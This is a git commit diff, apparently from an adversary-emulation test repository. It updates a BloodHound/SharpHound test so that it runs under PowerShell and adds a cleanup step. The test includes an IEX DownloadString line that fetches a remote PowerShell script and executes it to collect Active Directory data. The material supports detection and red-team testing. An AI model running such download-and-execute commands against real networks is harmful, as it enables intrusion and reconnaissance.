Generate docs from job=validate_atomics_generate_docs branch=master
This commit is contained in:
parent
647222638f
commit
2ad2ad0ffd
@@ -88,13 +88,17 @@ and then compress and store the data to the temp directory on the machine
|
||||
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```cmd
|
||||
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
|
||||
```powershell
|
||||
IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
Remove-Item $env:temp\*BloodHound.zip -Force
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
+6
-3
@@ -23068,10 +23068,13 @@ execution:
|
||||
type: url
|
||||
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
|
||||
executor:
|
||||
name: command_prompt
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
|
||||
Invoke-BloodHound"
|
||||
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
|
||||
Invoke-BloodHound
|
||||
|
||||
'
|
||||
cleanup_command: 'Remove-Item $env:temp\*BloodHound.zip -Force
|
||||
|
||||
'
|
||||
- name: Obfuscation Tests
|
||||
|
||||
Reference in New Issue
Block a user